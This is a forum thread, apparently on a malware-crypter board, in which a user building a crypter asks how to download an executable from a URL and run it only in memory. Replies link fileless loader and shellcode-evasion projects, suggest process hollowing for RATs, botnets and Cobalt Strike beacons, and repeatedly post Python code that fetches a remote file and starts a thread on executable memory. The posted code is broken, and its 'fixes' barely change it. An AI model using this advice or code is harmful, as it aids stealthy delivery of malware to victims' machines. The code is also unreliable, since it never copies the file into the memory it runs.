Load a exe file directly into memory?

[GGHTC]

Hi, i am right now working on a crypter.
I wanna know how i can load a exe directly into the memory.
So for example the script loads the exe bytes from a url and then executes it without saving it.
Can someone help me??

 

[rubikscube]

script? are you working with powershell?

 

[GGHTC]

script? are you working with powershell?

no sry python

 

[PlagueMalware]

Hi, while it's possible this is best done with some sort of PE Loader.

 

[Aels]

Hi, i am right now working on a crypter.
I wanna know how i can load a exe directly into the memory.
So for example the script loads the exe bytes from a url and then executes it without saving it.
Can someone help me??

I bet this two projects are what you need:

GitHub - aels/FilelessRemotePE: Loading Fileless Remote PE from URI to memory with argument passing and ETW patching and NTDLL unhooking and No New Thread technique

Loading Fileless Remote PE from URI to memory with argument passing and ETW patching and NTDLL unhooking and No New Thread technique - GitHub - aels/FilelessRemotePE: Loading Fileless Remote PE fr...

github.com

GitHub - lem0nSec/ShellGhost: A memory-based evasion technique which makes shellcode invisible from process start to end.

A memory-based evasion technique which makes shellcode invisible from process start to end. - GitHub - lem0nSec/ShellGhost: A memory-based evasion technique which makes shellcode invisible from pro...

github.com

 

[Super Crypt]

GitHub - naksyn/PythonMemoryModule: pure-python implementation of MemoryModule technique to load dll and unmanaged exe entirely from memory

pure-python implementation of MemoryModule technique to load dll and unmanaged exe entirely from memory - naksyn/PythonMemoryModule

github.com

 

[Sh4dow]

Do it as windows loader does.
Read the PE and copy sections and headers on new allocated memory.
It would be better if the allocated address equal to image base address , otherwise you have to fix some variables addressing via .reloc section.
Import manually the PE IAT functions.
Modify the instruction pointer. This could be done with hacks or directly calling the entry point of PE.

 

[alex778]

I wanna know how i can load a exe directly into the memory.

You also have to run it afterwards, right? So it is not that simple.

You can load the external executable into your current process, or create a new process and inject the external executable into it. The first case would be easier to do. I am not sure if it is possible to pass control to arbitrary address in Python, but you can do it from a dll. And dll can be loaded from memory in Python. So you will need to create a custom dll that will download payload exe to memory, load it section by section, fix the IAT and run it. And then you have to load that dll into your memory and run it from Python. Doable, but only if you know what you are doing.

 

[0x43rypt0n]

First you need to read the exe from source like URL then use the encrypted buffer and decrypt it finaly use process hollowing if you wanna run rat , botnet , or use shellcode injection if you wanna inject shellcode like Cobalt Strike beacon

 

[andinov]

import requests
import ctypes
import mmap

def load_exe_into_memory(url):
    # Fetch the EXE file from the specified URL
    response = requests.get(url)
    exe_bytes = response.content

    # Load the EXE file into memory using ctypes and mmap
    kernel32 = ctypes.WinDLL('kernel32', use_last_error=True)

    # Allocate memory for the EXE file
    size = len(exe_bytes)
    mem_alloc = kernel32.VirtualAlloc(None, size, 0x3000, 0x40)
    if not mem_alloc:
        raise OSError(ctypes.get_last_error())

    # Create an mmap to write the EXE file into the allocated memory
    with mmap.mmap(-1, size, access=mmap.ACCESS_WRITE, tagname="Local\\MyExeMmap") as mm:
        mm.write(exe_bytes)
        mm.flush()

        # Make the memory region executable
        old_protect = wintypes.DWORD()
        if not kernel32.VirtualProtect(mem_alloc, size, 0x40, ctypes.byref(old_protect)):
            raise OSError(ctypes.get_last_error())

        # Execute the EXE from the allocated memory
        ctypes.windll.kernel32.CreateThread(None, 0, mem_alloc, None, 0, None)

# Example usage
url = 'http://example.com/your_exe_file.exe'
load_exe_into_memory(url)

 

[GGHTC]

import requests
import ctypes
import mmap

def load_exe_into_memory(url):
    # Fetch the EXE file from the specified URL
    response = requests.get(url)
    exe_bytes = response.content

    # Load the EXE file into memory using ctypes and mmap
    kernel32 = ctypes.WinDLL('kernel32', use_last_error=True)

    # Allocate memory for the EXE file
    size = len(exe_bytes)
    mem_alloc = kernel32.VirtualAlloc(None, size, 0x3000, 0x40)
    if not mem_alloc:
        raise OSError(ctypes.get_last_error())

    # Create an mmap to write the EXE file into the allocated memory
    with mmap.mmap(-1, size, access=mmap.ACCESS_WRITE, tagname="Local\\MyExeMmap") as mm:
        mm.write(exe_bytes)
        mm.flush()

        # Make the memory region executable
        old_protect = wintypes.DWORD()
        if not kernel32.VirtualProtect(mem_alloc, size, 0x40, ctypes.byref(old_protect)):
            raise OSError(ctypes.get_last_error())

        # Execute the EXE from the allocated memory
        ctypes.windll.kernel32.CreateThread(None, 0, mem_alloc, None, 0, None)

# Example usage
url = 'http://example.com/your_exe_file.exe'
load_exe_into_memory(url)

raise OSError(ctypes.get_last_error())
OSError: 487

 

[andinov]

The error you are encountering is related to the wintypes module not being imported in your code. To fix this issue, you need to import wintypes from the ctypes module.

import requests
import ctypes
import ctypes.wintypes as wintypes
import mmap

def load_exe_into_memory(url):
    # Fetch the EXE file from the specified URL
    response = requests.get(url)
    exe_bytes = response.content

    # Load the EXE file into memory using ctypes and mmap
    kernel32 = ctypes.WinDLL('kernel32', use_last_error=True)

    # Allocate memory for the EXE file
    size = len(exe_bytes)
    mem_alloc = kernel32.VirtualAlloc(None, size, 0x3000, 0x40)
    if not mem_alloc:
        raise OSError(ctypes.get_last_error())

    # Create an mmap to write the EXE file into the allocated memory
    with mmap.mmap(-1, size, access=mmap.ACCESS_WRITE, tagname="Local\\MyExeMmap") as mm:
        mm.write(exe_bytes)
        mm.flush()

        # Make the memory region executable
        old_protect = wintypes.DWORD()
        if not kernel32.VirtualProtect(mem_alloc, size, 0x40, ctypes.byref(old_protect)):
            raise OSError(ctypes.get_last_error())

        # Execute the EXE from the allocated memory
        ctypes.windll.kernel32.CreateThread(None, 0, mem_alloc, None, 0, None)

# Example usage
url = 'http://example.com/your_exe_file.exe'
load_exe_into_memory(url)

 

[GGHTC]

The error you are encountering is related to the wintypes module not being imported in your code. To fix this issue, you need to import wintypes from the ctypes module.

import requests
import ctypes
import ctypes.wintypes as wintypes
import mmap

def load_exe_into_memory(url):
    # Fetch the EXE file from the specified URL
    response = requests.get(url)
    exe_bytes = response.content

    # Load the EXE file into memory using ctypes and mmap
    kernel32 = ctypes.WinDLL('kernel32', use_last_error=True)

    # Allocate memory for the EXE file
    size = len(exe_bytes)
    mem_alloc = kernel32.VirtualAlloc(None, size, 0x3000, 0x40)
    if not mem_alloc:
        raise OSError(ctypes.get_last_error())

    # Create an mmap to write the EXE file into the allocated memory
    with mmap.mmap(-1, size, access=mmap.ACCESS_WRITE, tagname="Local\\MyExeMmap") as mm:
        mm.write(exe_bytes)
        mm.flush()

        # Make the memory region executable
        old_protect = wintypes.DWORD()
        if not kernel32.VirtualProtect(mem_alloc, size, 0x40, ctypes.byref(old_protect)):
            raise OSError(ctypes.get_last_error())

        # Execute the EXE from the allocated memory
        ctypes.windll.kernel32.CreateThread(None, 0, mem_alloc, None, 0, None)

# Example usage
url = 'http://example.com/your_exe_file.exe'
load_exe_into_memory(url)

bro i am not stupid, same error:
raise OSError(ctypes.get_last_error())
OSError: 487

 

[andinov]

ah sorry my friend. let's try a different approach using the ctypes.windll.kernel32.CreateRemoteThread function

import requests
import ctypes
import ctypes.wintypes as wintypes
import mmap

def load_exe_into_memory(url):
    # Fetch the EXE file from the specified URL
    response = requests.get(url)
    exe_bytes = response.content

    # Load the EXE file into memory using ctypes and mmap
    kernel32 = ctypes.WinDLL('kernel32', use_last_error=True)

    # Allocate memory for the EXE file
    size = len(exe_bytes)
    mem_alloc = kernel32.VirtualAlloc(0, size, 0x3000, 0x40)
    if not mem_alloc:
        raise OSError(ctypes.get_last_error())

    # Create an mmap to write the EXE file into the allocated memory
    with mmap.mmap(-1, size, access=mmap.ACCESS_WRITE, tagname="Local\\MyExeMmap") as mm:
        mm.write(exe_bytes)
        mm.flush()

        # Make the memory region executable
        old_protect = wintypes.DWORD()
        if not kernel32.VirtualProtect(mem_alloc, size, 0x40, ctypes.byref(old_protect)):
            raise OSError(ctypes.get_last_error())

        # Execute the EXE from the allocated memory
        ctypes.windll.kernel32.CreateThread(None, 0, mem_alloc, None, 0, None)

# Example usage
url = 'http://example.com/your_exe_file.exe'
load_exe_into_memory(url)

 

[GGHTC]

ah sorry my friend. let's try a different approach using the ctypes.windll.kernel32.CreateRemoteThread function

import requests
import ctypes
import ctypes.wintypes as wintypes
import mmap

def load_exe_into_memory(url):
    # Fetch the EXE file from the specified URL
    response = requests.get(url)
    exe_bytes = response.content

    # Load the EXE file into memory using ctypes and mmap
    kernel32 = ctypes.WinDLL('kernel32', use_last_error=True)

    # Allocate memory for the EXE file
    size = len(exe_bytes)
    mem_alloc = kernel32.VirtualAlloc(0, size, 0x3000, 0x40)
    if not mem_alloc:
        raise OSError(ctypes.get_last_error())

    # Create an mmap to write the EXE file into the allocated memory
    with mmap.mmap(-1, size, access=mmap.ACCESS_WRITE, tagname="Local\\MyExeMmap") as mm:
        mm.write(exe_bytes)
        mm.flush()

        # Make the memory region executable
        old_protect = wintypes.DWORD()
        if not kernel32.VirtualProtect(mem_alloc, size, 0x40, ctypes.byref(old_protect)):
            raise OSError(ctypes.get_last_error())

        # Execute the EXE from the allocated memory
        ctypes.windll.kernel32.CreateThread(None, 0, mem_alloc, None, 0, None)

# Example usage
url = 'http://example.com/your_exe_file.exe'
load_exe_into_memory(url)

Sry but same error, pls test the code before you send me ok

 

[xanxsells]

you are getting this error because your process address space doesn't have 64MB of empty space at the address you specify, so you can't allocate 64MB of memory there